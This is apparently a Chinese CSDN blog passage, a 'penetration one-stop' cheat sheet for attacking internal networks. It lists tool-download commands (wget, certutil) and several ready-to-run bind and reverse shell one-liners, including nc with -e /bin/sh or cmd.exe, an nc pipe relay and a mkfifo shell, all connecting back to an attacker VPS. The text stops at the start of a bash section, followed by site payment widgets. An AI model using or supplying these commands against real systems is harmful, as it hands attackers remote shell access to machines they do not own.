内网渗透一条龙简洁版

本文详细介绍了内网渗透过程,包括反弹shell的各种方法,如nc、bash、python、php和perl反弹;添加和删除用户的方法,针对Linux和Windows;本机信息收集技巧,涉及Windows和Linux的重要文件;内网穿透的reg、Meterpreter和cobaltstrike代理;以及横向移动的策略,如弱口令检查、端口扫描和Meterpreter的利用。
摘要由CSDN通过智能技术生成

内网渗透一条龙简洁版

反弹shell

工具准备

搭建http服务

python快速在当前目录搭建http服务

python -m SimpleHTTPServer 8000

Linux下载命令:

wget http://fuck/nc

Linux解压缩命令:

#解压
tar -zxvf FileName.tar.gz
#压缩
tar -zcvf FileName.tar.gz DirName

Window下载命令

certutil -urlcache -split -f http://fuck/nc.exe

P.S.

python获取标准shell,可交互

python -c "import pty;pty.spawn('/bin/bash')"

命令在线编码

http://www.jackson-t.ca/runtime-exec-payloads.html

正向shell

攻击机

nc 靶机ip 4444

靶机

nc -lvp 4444 -e /bin/sh
nc -lvp 4444 -e c:\windows\system32\cmd.exe

反向shell

当机器处于内网,只能使用反向shell。

nc反弹

攻击机

nc -lvp 4444 

靶机

nc vps.ip 4444 -e /bin/sh
nc vps.ip 4444 -e c:\windows\system32\cmd.exe

如果nc禁用了-e参数,则可以使用linux管道符|协助进行反弹,但是攻击机需要打开两个终端,一个终端输入命令,一个终端输出结果。

靶机

nc vps.ip 4444|/bin/bash|nc vps.ip 4445

攻击机

nc -lvp 4444   //此处输入命令
nc -lvp 4445   //此处输出结果

安装的nc版本有问题时

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc vps.ip 4444 >/tmp/f
bash反
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值